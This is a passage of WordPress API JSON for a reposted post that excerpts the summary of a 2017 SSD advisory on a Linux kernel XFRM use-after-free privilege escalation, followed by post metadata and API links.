src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-300x30.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 23 Nov 2017 06:59:02 +0000<\/strong><\/p>\n<p>\ufeffVulnerability Summary The following advisory describes a Use-after-free vulnerability found in Linux kernel that can lead to privilege escalation. The vulnerability found in Netlink socket subsystem &#8211; XFRM. Netlink is used to transfer information between the kernel and user-space processes. It consists of a standard sockets-based interface for user space processes and an internal kernel &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3535\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Linux Kernel XFRM Privilege Escalation<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11946,10757,13145],"class_list":["post-10588","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-privilege-escalation","tag-securiteam-secure-disclosure","tag-use-after-free"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10588","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10588"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10588\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10588"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10588"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10588"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}